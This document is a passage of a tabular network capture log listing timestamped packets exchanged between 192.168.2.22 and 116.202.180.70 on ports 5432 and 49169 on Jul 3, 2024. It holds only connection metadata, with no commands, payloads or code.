Jul 3, 2024 02:22:32.007864952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007875919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007885933 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007896900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007898092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007909060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007910013 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007919073 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007922888 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007930040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007937908 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007939100 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007949114 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007951021 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007956982 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007962942 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007967949 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007977009 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.007978916 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.007991076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.008002996 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.008338928 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.022665024 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022675991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022685051 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022696018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022713900 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.022726059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.022782087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022825956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022830009 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.022836924 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022859097 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.022869110 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.022903919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022913933 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022922993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.022947073 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.022958040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.022990942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.023000956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.023010969 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.023020983 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.023035049 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.023036003 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.023051023 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.023058891 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036472082 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036484957 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036505938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036518097 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036535025 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036536932 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036544085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036547899 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036556959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036559105 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036567926 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036572933 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036588907 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036597013 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036618948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036628008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036638021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036648035 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036657095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036665916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036669970 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036675930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.036685944 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036693096 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.036705017 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045427084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045475960 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045490026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045501947 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045535088 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045571089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045581102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045591116 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045617104 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045628071 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045644999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045655012 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045665026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045677900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045690060 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045701027 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045705080 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045710087 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045715094 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045725107 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045736074 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045736074 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045743942 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045746088 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.045758009 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.045778990 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.052788019 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.052820921 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.052829027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.052839994 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.052856922 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.052866936 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.052885056 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.052895069 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.052931070 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.052937031 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.052947998 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.052972078 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.052982092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064644098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064682007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064691067 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064694881 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064707994 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064714909 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064718008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064728022 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064745903 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064759016 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064804077 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064814091 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064824104 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064835072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064845085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064856052 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064867973 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064915895 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064924955 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064934969 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064939976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064949036 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064954042 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064956903 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064961910 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064973116 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064975023 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064982891 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.064985991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.064995050 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065011024 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065017939 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065032005 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065042019 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065051079 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065068960 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065076113 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065083027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065094948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065104008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065115929 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065126896 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065170050 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065202951 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065212965 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065222979 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065243959 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065253973 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065279961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065290928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065300941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.065318108 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065327883 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.065488100 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.097726107 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.097796917 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.097816944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.097827911 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.097839117 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.097850084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.097861052 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.097867966 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.097872019 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.097876072 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.097923040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.097955942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.097965956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.097975969 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098001003 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098010063 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098018885 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098036051 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098047018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098057032 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098057985 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098067045 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098077059 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098081112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098086119 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098089933 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098114014 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098310947 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098330975 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098351002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098364115 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098381996 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098403931 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098422050 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098438978 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098462105 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098472118 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098483086 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098494053 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098495007 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098504066 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098509073 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098522902 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098527908 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098537922 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098567963 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098603964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098613977 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098623991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098634958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098647118 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098649025 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098660946 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098660946 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098675966 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098690987 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098773003 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098783970 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098792076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098794937 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098819971 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098819971 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098830938 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098844051 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098854065 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098864079 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098885059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098891020 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098902941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098903894 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098912001 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.098920107 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098933935 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.098951101 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113447905 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113496065 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113543034 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113553047 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113563061 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113579035 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113579988 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113604069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113631964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113641977 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113651037 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113662004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113666058 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113672018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113682985 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113691092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113692999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113702059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113703012 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113713980 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113723040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113734007 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.113734961 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113765955 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.113986015 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127321005 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127372980 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127398968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127408981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127418995 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127429962 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127432108 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127439976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127444029 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127455950 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127455950 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127464056 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127466917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127481937 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127487898 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127491951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127495050 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127501965 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127507925 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127512932 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127520084 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127522945 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127532005 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.127532959 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127545118 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127562046 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.127872944 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136370897 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136379957 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136389017 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136399984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136408091 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136419058 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136420012 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136428118 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136429071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136441946 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136451006 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136457920 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136466980 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136476994 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136493921 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136496067 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136501074 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136504889 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136513948 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136514902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136523962 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136537075 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136544943 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136600971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136611938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.136635065 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.136887074 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.143732071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.143740892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.143749952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.143774986 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.143784046 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.143785000 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.143795013 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.143802881 CEST	49169	5432	192.168.2.22	116.202.180.70
